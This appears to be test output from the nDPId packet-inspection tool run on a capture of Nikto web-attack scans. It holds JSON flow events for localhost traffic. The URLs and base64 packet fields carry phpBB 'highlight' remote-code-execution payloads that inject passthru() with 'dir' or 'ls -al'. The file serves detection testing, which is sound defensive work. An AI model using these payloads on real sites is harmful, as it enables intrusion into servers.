00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1576420277785,"pkt":"AAAAAAAAAAAAAAAACABFAAFUq9tAAEAGj8Z\/AAABfwAAAcbiH5CAV5MAtOr6\/IAYAED\/SAAAAQEICp1m\/0GdZv9BR0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01204{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1576420277786,"pkt":"AAAAAAAAAAAAAAAACABFAAFOulhAAEAGgU9\/AAABfwAAAcbkH5AY64NxSFA9PIAYAED\/QgAAAQEICp1m\/0KdZv9CR0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277788,"pkt":"AAAAAAAAAAAAAAAACABFAAFMGchAAEAGIeJ\/AAABfwAAAcbmH5Ae1yDiPfgPVIAYAED\/QAAAAQEICp1m\/0OdZv9DR0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQoNCg=="}
01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277790,"pkt":"AAAAAAAAAAAAAAAACABFAAFMIAVAAEAGG6V\/AAABfwAAAcboH5Bd5RklMuM7\/YAYAED\/QAAAAQEICp1m\/0adZv9GR0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277792,"pkt":"AAAAAAAAAAAAAAAACABFAAFfB5NAAEAGNAR\/AAABfwAAAcbqH5CefT66jrIPCIAYAED\/UwAAAQEICp1m\/0idZv9HR0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277794,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgStAAEAGumR\/AAABfwAAAcbsH5DtZbgCN0MtSoAYAED\/WgAAAQEICp1m\/0qdZv9KR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01220{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277795,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgfFAAEAGuZ5\/AAABfwAAAcbuH5ChILjHXT7L3YAYAED\/WgAAAQEICp1m\/0udZv9LR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NSkNCg0K"}
01220{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00859{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277797,"pkt":"AAAAAAAAAAAAAAAACABFAAFPlMhAAEAGpt5\/AAABfwAAAcbwH5AHpq3wv20OaIAYAED\/QwAAAQEICp1m\/02dZv9NR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277799,"pkt":"AAAAAAAAAAAAAAAACABFAAFm4IpAAEAGWwV\/AAABfwAAAcbyH5CWqtmi9bUd64AYAED\/WgAAAQEICp1m\/0+dZv9PR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"}
01220{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
